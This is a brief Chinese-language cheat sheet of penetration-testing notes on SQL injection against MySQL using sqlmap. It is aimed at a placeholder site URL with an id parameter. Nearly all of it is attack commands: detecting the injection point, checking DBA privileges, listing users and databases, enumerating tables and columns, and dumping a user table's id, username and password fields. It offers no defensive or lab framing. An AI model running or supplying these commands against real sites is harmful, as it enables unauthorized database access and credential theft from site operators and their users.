SQLMAP渗透笔记之MySQL数据库注入

---------------------------------------------------------------------------------------------

                SQLMAP渗透笔记之MySQL数据库注入

---------------------------------------------------------------------------------------------

sqlmap.py -u http://www.xx.com/show.php?id=81 --当前用户权限

例：

sqlmap.py -u "http://www.xx.com/show.php?id=81" --is-dba

sqlmap.py -u http://www.xx.com/show.php?id=81 --所有数据库用户

例：

sqlmap.py -u "http://www.xx.com/show.php?id=81" --users

sqlmap.py -u http://www.xx.com/show.php?id=81 --当前数据库用户

例：

sqlmap.py -u "http://www.xx.com/show.php?id=81" --current-user

1.检测注入点，判断数据库类型及服务器等类型

sqlmap.py -u http://www.xx.com/show.php?id=81
例：

sqlmap.py -u "http://www.xx.com/show.php?id=81"

2.获取所有数据库

sqlmap.py -u http://www.xx.com/show.php?id=81 --获取所有数据库

例：

sqlmap.py -u "http://www.xx.com/show.php?id=81" --dbs

3.获取网站当前数据库

sqlmap.py -u http://www.xx.com/show.php?id=81 --获取网站当前数据库

例：

sqlmap.py -u "http://www.xx.com/show.php?id=81" --current-db

4.获取数据库中的表

sqlmap.py -u http://www.xx.com/show.php?id=81 -D 指定一个数据库 --tables

例：

sqlmap.py -u "http://www.xx.com/show.php?id=81" -D zsb --tables

5.获取数据表中的字段

sqlmap.py -u http://www.xx.com/show.php?id=81 -D 数据库 -T 数据表 --columns 

例：

sqlmap.py -u "http://www.xx.com/show.php?id=81" -D zsb -T user --columns

6.获取字段中的内容

sqlmap.py -u http://www.xx.com/show.php?id=81 -D 数据库 -T 数据表 -C 字段名1,字段名2,字段名3... --dump

例：

sqlmap.py -u "http://www.xx.com/show.php?id=81" -D zsb -T user -C "u_id,u_name,u_pass" --dump